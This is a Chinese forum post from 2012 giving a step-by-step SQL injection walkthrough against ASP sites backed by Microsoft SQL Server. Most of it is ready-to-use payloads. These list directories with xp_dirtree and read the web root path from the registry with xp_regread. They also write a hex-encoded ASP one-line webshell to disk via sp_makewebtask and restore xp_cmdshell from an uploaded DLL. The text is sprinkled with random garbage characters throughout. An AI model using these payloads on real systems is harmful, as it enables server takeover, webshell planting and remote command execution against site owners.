好,我们exec master..xp_dirtree'd:/test', N. I+ L; R3 E- ?
假设我们在test里有两个文件夹test1和test2在test1里又有test35 z& n- u" J3 a
结果显示
( q: ~ \! W n3 W4 m! G) U) z
4 q3 g! u' l$ d4 c% jsubdirectory depth
, y& q/ K9 L6 z6 y/ s* j3 Btest1 1& F6 w! |% z( V/ k: y
test3 2
8 q9 @6 p: Q& T+ v/ Itest2 1
4 R$ S5 k) ]9 n% M! |6 `; @! I0 n$ q7 q: s
% O i; ^4 B( t9 a; t( }+ O6 `6 e哈哈发现没有那个depth就是目录的级数9 \" f7 {+ s4 c, H" r2 K0 Q
ok了,知道怎么办了吧
# X0 J0 a( b1 t5 u
: N3 G2 F0 \8 R8 u# e5 r$ ]" \http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)--
4 t3 v; @5 ?% bhttp://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'd:\' -- : [. T: F* s! O0 K( y
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where id=1)-, v+ i9 M4 `. G. E
d* I6 [0 y) ?, W) r! F只要加上id=1,就是第一级目录 。' w) [- H4 X! q7 f
) d# i- W5 }2 n# d; x$ F/ R: I
1 B1 u( l/ r3 A2 @, j2 Z: J通过注册表读网站路径:" ?2 V- c. u% K2 x& ]4 g3 h2 u& H
1 r8 M% `+ C! g1.;create table [dbo].[cyfd] ([gyfd][char](255));
/ L% G/ I2 t, s+ v# P4 O% D4 S. |$ t R) s, y/ @
2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--
6 a9 k: L7 N$ i7 @5 J9 Eid=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--
; e7 n8 K# s p% L/ O* A7 b& R- b' v
' Y8 [- b, v+ _& v) X3.and 1=(select count(*) from 临时表 where 临时字段名>1)3 C+ C8 ^) Y! @# G3 F1 `1 ~
and 1=(select count(*) from cyfd where gyfd > 1)
3 c, x8 U" {" a' u. a8 M3 `这样IE报错,就把刚才插进去的Web路径的值报出来了
C4 L( _2 f6 E9 f$ a* {
2 U: [. X7 i, a% K, T/ N4.drop table cyfd;-- 删除临时表% x6 J' R$ b& J, l r9 u
$ e5 q# E* z' e; b0 V9 E! M$ x
获得webshell方法:
. K! y+ q4 n0 V- L1.create table cmd (a image)-- \**cmd是创建的临时表
" E# [; o! N& p* j( G/ \
* i; f/ p: h- F2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话
9 T% h6 n. e7 O3 c
( G2 G/ o1 h0 ~8 y& v( U2 D% r; A% s( t6 |8 a. Y; \
3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd'6 F5 b4 k# A2 }' Z/ S. g
EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'( J1 f$ `5 U* I1 o9 v7 h
3 S m( e- @2 U+ A# B! A. y) N
4.drop table cmd;-- 删除cmd临时表) ?( A" ]+ F/ Y ?$ ?4 j- H
y% }5 m" n* I* p: t
恢复xp_cmdshell方法之一:
6 W9 d3 x ]- x# Y我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交:
2 @4 n4 y5 ]/ {" [( `2 Yhttp://www.something.com/script.asp?id=2;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetpub\wwwroot\xplog70.dll' V K# N+ o. v4 s4 D
恢复,支持绝对路径的恢复哦。:)
9 o" h1 ]5 P% C |
发表于 2012-9-13 17:20:30
收藏
支持
反对